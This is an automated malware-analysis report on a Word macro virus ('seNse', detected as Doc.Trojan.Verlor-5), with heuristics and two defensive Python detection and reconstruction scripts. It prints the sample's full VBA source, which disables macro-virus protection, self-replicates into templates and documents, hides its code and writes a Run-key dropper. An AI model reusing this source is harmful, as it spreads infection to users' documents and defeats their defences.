Verdict: MALICIOUS
Risk Score: 296
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
The sample contains legacy WordBasic markers and VBA macros, including an AutoClose macro. AutoClose first turns off Word's macro-virus protection (Options.VirusProtection = False) and the Normal-template save prompt, then replicates: it exports Module1 with VBComponent.Export to %windir%\tempad.dll or %windir%\tempnt.dll (the file is a plain-text VBA module whatever its extension) and imports it into the Normal template, or from Normal into the active document, so the code spreads to every document closed afterwards. Two further macros, ToolsMacro and ViewVBCode, hook the built-in Tools > Macro command and the Visual Basic editor: they copy Module1's lines out, delete them from Normal and from every open document, wait until the dialog or editor is closed, then insert them again, so a user who inspects the project sees an empty module. ViewVBCode also calls Stealth, which writes a VBScript to C:\Windows\seNse.a.vbs, exports Module1 to %windir%\seNse.a.dll, writes RegisteredOwner = 'f0re' under HKLM\Software, and registers the value 'seNse' under HKCU\Software\Microsoft\Windows\CurrentVersion\Run with the data %windir%\seNse.vbs. Note the mismatch between the Run value (seNse.vbs) and the file actually dropped (seNse.a.vbs): as extracted, the autostart entry does not launch the script. The script itself, if run, starts Word through COM, removes Module1 from Normal and re-imports it from seNse.a.dll, restoring the infection after a cleanup. Two caveats for anyone reproducing this in a sandbox: the extracted source refers to CodeModule1 throughout, whereas the VBE object model exposes CodeModule, so those statements raise errors that On Error Resume Next swallows; and the preview ends with an End Sub outside any procedure. Whether these are extraction artifacts or defects in the sample is best settled by detonating the document rather than inferred from the text.
Heuristics (7)
- ClamAV: Doc.Trojan.Verlor-5 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Trojan.Verlor-5.
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings). Document contains VBA macro code.
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION). VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script:
  `NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.deletelines 1, NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script:
  `Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"`
  The call sits inside a string the macro writes to the dropped VBScript; the macro itself does not invoke CreateObject, the script it drops does.
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE). Matched line in script:
  `Sub AutoClose()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script:
  `windir = Environ("windir")`
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS). OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them. In this sample the relevant names are AutoClose, ToolsMacro and ViewVBCode.
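The two findings that carry this verdict, self-replication through the VBE object model and the Run-key write described in the summary, can be reproduced outside the analyzer with plain pattern matching over olevba's decoded output. The following Python is an added example, not the analyzer's rule engine or the sample's code: rule names, severities and the regular expressions are this example's own, and the input text is constructed from lines of the script shown on this page.

```python
"""Static triage of olevba-decoded VBA for W97M-style macro-virus behaviour.

Added example, not the analyzer's rule engine: it re-creates, as regular
expressions over the decoded macro text, the behaviours the heuristics above
describe.  Rule names, severities and patterns are this example's own.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    line_no: int
    line: str


# (rule, severity, pattern).  VBA is case-insensitive, and the same VBE call
# can hang off NormalTemplate, ActiveDocument or Documents(X), so the patterns
# key on the VBProject.VBComponents path plus the mutating method name.
RULES = [
    ("vbe_self_replication", "critical", re.compile(
        r"\.VBProject\.VBComponents\b.*\.(Export|Import|Remove|InsertLines|"
        r"DeleteLines|AddFromString)\b", re.I)),
    ("av_tamper", "critical", re.compile(
        r"\bOptions\.VirusProtection\s*=\s*False\b", re.I)),
    ("run_key_write", "high", re.compile(
        r"PrivateProfileString\([^)]*CurrentVersion\\run\b", re.I)),
    ("drops_script", "high", re.compile(
        r'^Open\s+.+\.(vbs|js|bat|cmd|ps1)"\s+For\s+(Append|Output)\b', re.I)),
    ("hooks_builtin_command", "medium", re.compile(
        r"^Sub\s+(ToolsMacro|ViewVBCode|FileSaveAs|FileOpen|FileClose)\b", re.I)),
    ("autoexec_macro", "low", re.compile(
        r"^Sub\s+(AutoOpen|AutoClose|AutoExec|AutoNew|AutoExit|"
        r"Document_Open|Document_Close)\b", re.I)),
]

# Constructed input: a subset of the lines from the script on this page.
SAMPLE = r"""Sub AutoClose()
'MyName = seNse
On Error Resume Next
windir = Environ("windir")
Options.VirusProtection = False
If NormalTemplate.VBProject.VBComponents.Item("Module1").CodeModule1.Lines(3, 1) <> "'MyName = seNse" Then
ActiveDocument.VBProject.VBComponents("Module1").Export (windir & "\tempad.dll")
NormalTemplate.VBProject.VBComponents.import (windir & "\tempad.dll")
NormalTemplate.Save
End If
End Sub
Sub Stealth()
System.PrivateProfileString("", "HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run", "seNse") = windir & "\seNse.vbs"
Open "c:\windows\seNse.a.vbs" For Append As #1
Print #1, "On error resume next"
Close #1
End Sub
Sub ToolsMacro()
NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.deletelines 1, 10
End Sub
"""


def scan(vba_source: str) -> list[Finding]:
    """One Finding per (line, rule) hit, in source order."""
    findings = []
    for line_no, raw in enumerate(vba_source.splitlines(), start=1):
        line = raw.strip()
        for rule, severity, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(rule, severity, line_no, line))
    return findings


def verdict(findings: list[Finding]) -> str:
    """Self-replication through the VBE object model has no benign document
    use, so one hit is decisive on its own, independent of any AV signature;
    the other rules only mark the file as suspicious."""
    rules = {f.rule for f in findings}
    if "vbe_self_replication" in rules:
        return "macro-virus"
    if rules & {"av_tamper", "run_key_write", "drops_script"}:
        return "suspicious"
    return "clean"


if __name__ == "__main__":
    hits = scan(SAMPLE)
    for f in hits:
        print(f"{f.severity:8} {f.rule:22} L{f.line_no}: {f.line}")
    print("verdict:", verdict(hits))
```

The patterns are deliberately loose (method name rather than full object path) because the sample reaches the same CodeModule through NormalTemplate, ActiveDocument and Documents(X); tighten them only after checking what a benign add-in in your environment looks like, since Export/Import are also used by legitimate VBA tooling.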
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5114 bytes | e8ce4c985f51c522e003f1d0d25f26c51ee2fac5871bd04c5bbb7a5c2ee40f6f | ClamAV: Doc.Trojan.Verlor-5 | unlikely |
Preview script (first 1,000 lines of the extracted script)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub AutoClose()
'MyName = seNse
'WrittenBy = f0re [UC/Skamwerks/DVC]
'Version = .A (1.2)
On Error Resume Next
windir = Environ("windir")
If Dir(windir & "\tempad.dll") <> "" Then Kill (windir & "\tempad.dll")
If Dir(windir & "\tempnt.dll") <> "" Then Kill (windir & "\tempnt.dll")
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
If NormalTemplate.VBProject.VBComponents.Item("Module1").CodeModule1.Lines(3, 1) <> "'MyName = seNse" Then
ActiveDocument.VBProject.VBComponents("Module1").Export (windir & "\tempad.dll")
NormalTemplate.VBProject.VBComponents.import (windir & "\tempad.dll")
NormalTemplate.Save
End If
If ActiveDocument.VBProject.VBComponents.Item("Module1").CodeModule1.Lines(3, 1) <> "'MyName = seNse" Then
NormalTemplate.VBProject.VBComponents("Module1").Export (windir & "\tempnt.dll")
ActiveDocument.VBProject.VBComponents.import (windir & "\tempnt.dll")
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End Sub
Sub Stealth()
On Error Resume Next
windir = Environ("windir")
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\software\", "RegisteredOwner") = "f0re"
System.PrivateProfileString("", "HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run", "seNse") = windir & "\seNse.vbs"
If Dir(windir & "\seNse.a.vbs") <> "" Then Kill (windir & "\seNse.a.vbs")
If Dir(windir & "\seNse.a.dll") <> "" Then Kill (windir & "\seNse.a.dll")
Open "c:\windows\seNse.a.vbs" For Append As #1
Print #1, "On error resume next"
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "WordObj.Options.SaveNormalPrompt = False"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.remove WordObj.NormalTemplate.VBProject.VBComponents(" & Chr(34) & "Module1" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.import (" & Chr(34) & windir & "\seNse.a.dll" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "set NT = nothing"
Print #1, "WordObj.Quit"
Close #1
NormalTemplate.VBProject.VBComponents("Module1").Export (windir & "\seNse.a.dll")
End Sub
Sub ViewVBCode()
On Error Resume Next
Call Stealth
For X = 1 To NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
Code = Code & NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.Lines(X, 1) & Chr(13)
Next X
NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.deletelines 1, NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
NormalTemplate.Saved = True
Docnumber = Application.Documents.Count
If Docnumber >= 1 Then
For X = 1 To Docnumber
Documents(X).VBProject.VBComponents("Module1").CodeModule1.deletelines 1, Documents(X).VBProject.VBComponents("Module1").CodeModule1.CountOfLines
Documents(X).Saved = True
Next X
End If
Application.ShowVisualBasicEditor = True
While Application.ShowVisualBasicEditor = True
DoEvents
Wend
NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.InsertLines 1, Code
NormalTemplate.Save
Docnumber = Application.Documents.Count
If Docnumber >= 1 Then
For X = 1 To Docnumber
Documents(X).VBProject.VBComponents("Module1").CodeModule1.InsertLines 1, Code
Documents(X).SaveAs Documents(X).FullName
Next X
End If
End Sub
Sub ToolsMacro()
On Error Resume Next
For X = 1 To NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
codeNT = codeNT & NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.Lines(X, 1) & Chr(13)
Next X
NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.deletelines 1, NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
NormalTemplate.Saved = True
Docnumber = Application.Documents.Count
If Docnumber >= 1 Then
For Y = 1 To ActiveDocument.VBProject.VBComponents("Module1").CodeModule1.CountOfLines
CodeAD = CodeAD & ActiveDocument.VBProject.VBComponents("Module1").CodeModule1.Lines(Y, 1) & Chr(13)
Next Y
For X = 1 To Docnumber
Documents(X).VBProject.VBComponents("Module1").CodeModule1.deletelines 1, Documents(X).VBProject.VBComponents("Module1").CodeModule1.CountOfLines
Documents(X).Saved = True
Next X
End If
Application.Dialogs(wdDialogToolsMacro).Show
If Application.ShowVisualBasicEditor = False Then
NormalTemplate.VBProject.VBComponents("Module1").CodeModule1.InsertLines 1, codeNT
NormalTemplate.Save
If Docnumber >= 1 Then
For X = 1 To Docnumber
Documents(X).VBProject.VBComponents("Module1").CodeModule1.InsertLines 1, CodeAD
Documents(X).SaveAs Documents(X).FullName
Next X
End If
End If
End Sub
'Put this code in a Module1 called "Module1". I created a form of stealth.
'However not full stealth. But it's a nice attempt i think/hope :).
End Sub
```
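The persistence chain in Stealth() can be verified from the text alone by evaluating the Print # expressions. The following Python is an added example, not code from the analyzer or the sample: a minimal evaluator for the VBA string expressions the routine uses (double-quoted literals joined with &, Chr(n), and the windir variable, assumed here to resolve to C:\WINDOWS) that reconstructs the dropped seNse.a.vbs, the Run-key value and the exported module path, and checks whether they actually line up. The Stealth() text it parses is copied from the preview above.

```python
"""Reconstruct the VBScript dropped by Stealth() and check the Run-key chain.

Added example, not analyzer or sample code.  It evaluates only the expression
forms present in the sample (string literals, & concatenation, Chr(n), the
windir variable); it is not a general VBA evaluator.  windir is an assumption.
"""
import re

# Constructed input: the Stealth() routine as shown in the script on this page.
STEALTH_SRC = r"""Sub Stealth()
On Error Resume Next
windir = Environ("windir")
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\software\", "RegisteredOwner") = "f0re"
System.PrivateProfileString("", "HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run", "seNse") = windir & "\seNse.vbs"
If Dir(windir & "\seNse.a.vbs") <> "" Then Kill (windir & "\seNse.a.vbs")
If Dir(windir & "\seNse.a.dll") <> "" Then Kill (windir & "\seNse.a.dll")
Open "c:\windows\seNse.a.vbs" For Append As #1
Print #1, "On error resume next"
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "WordObj.Options.SaveNormalPrompt = False"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.remove WordObj.NormalTemplate.VBProject.VBComponents(" & Chr(34) & "Module1" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.import (" & Chr(34) & windir & "\seNse.a.dll" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "set NT = nothing"
Print #1, "WordObj.Quit"
Close #1
NormalTemplate.VBProject.VBComponents("Module1").Export (windir & "\seNse.a.dll")
End Sub
"""

# A literal ("" is an escaped quote inside it), a Chr(n) call, or the variable.
TOKEN = re.compile(r'"((?:[^"]|"")*)"|Chr\((\d+)\)|\b(windir)\b', re.I)
PRINT_STMT = re.compile(r'^\s*Print\s+#(\d+),\s*(.+?)\s*$', re.I | re.M)
OPEN_STMT = re.compile(r'^\s*Open\s+(.+?)\s+For\s+(?:Append|Output)\s+As\s+#(\d+)', re.I | re.M)
EXPORT_STMT = re.compile(r'\.Export\s*\(?\s*(.+?)\)?\s*$', re.I | re.M)
RUN_KEY = re.compile(
    r'PrivateProfileString\(\s*"",\s*"([^"]*CurrentVersion\\run)",\s*"([^"]+)"\s*\)\s*=\s*(.+?)\s*$',
    re.I | re.M)


def eval_vba_string(expr: str, windir: str) -> str:
    """Concatenate the literals, Chr() values and windir found in expr; the
    '&' operators and anything unrecognised are skipped."""
    parts = []
    for literal, chr_code, var in TOKEN.findall(expr):
        if chr_code:
            parts.append(chr(int(chr_code)))
        elif var:
            parts.append(windir)
        else:
            parts.append(literal.replace('""', '"'))
    return "".join(parts)


def dropped_files(src: str, windir: str) -> dict[str, str]:
    """Map every file opened for writing to the text its Print # calls emit."""
    handles = {num: eval_vba_string(expr, windir) for expr, num in OPEN_STMT.findall(src)}
    contents = {path: [] for path in handles.values()}
    for num, expr in PRINT_STMT.findall(src):
        if num in handles:  # Print # to a handle we never saw opened is ignored
            contents[handles[num]].append(eval_vba_string(expr, windir))
    return {path: "\n".join(lines) + "\n" for path, lines in contents.items()}


def persistence_chain(src: str, windir: str = r"C:\WINDOWS") -> dict:
    """Tie the Run-key value, the dropped script and the exported module together."""
    files = dropped_files(src, windir)
    exports = [eval_vba_string(e, windir) for e in EXPORT_STMT.findall(src)]
    m = RUN_KEY.search(src)
    target = eval_vba_string(m.group(3), windir) if m else None
    return {
        "run_value": f"{m.group(1)}\\{m.group(2)}" if m else None,
        "run_target": target,
        "dropped": files,
        "exported_modules": exports,
        # Does the autostart entry point at a file the macro actually writes?
        "target_is_dropped": target is not None and target.lower() in {p.lower() for p in files},
        # Does the dropped script re-import a module the macro exports?
        "script_imports_export": any(e in text for e in exports for text in files.values()),
    }


if __name__ == "__main__":
    chain = persistence_chain(STEALTH_SRC)
    print("Run value :", chain["run_value"], "->", chain["run_target"])
    for path, text in chain["dropped"].items():
        print(f"Dropped   : {path}\n{text}")
    print("Exported  :", chain["exported_modules"])
    print("Run target is a dropped file:", chain["target_is_dropped"])
    print("Dropped script re-imports exported module:", chain["script_imports_export"])
```

Running it shows the Run value pointing at seNse.vbs while the only file written is seNse.a.vbs, the mismatch noted in the summary, and that the dropped script does re-import the seNse.a.dll module the macro exports. Because the evaluator silently drops expression forms it does not know, compare the reconstructed text against the Print lines before relying on it for a sample that uses other string-building tricks.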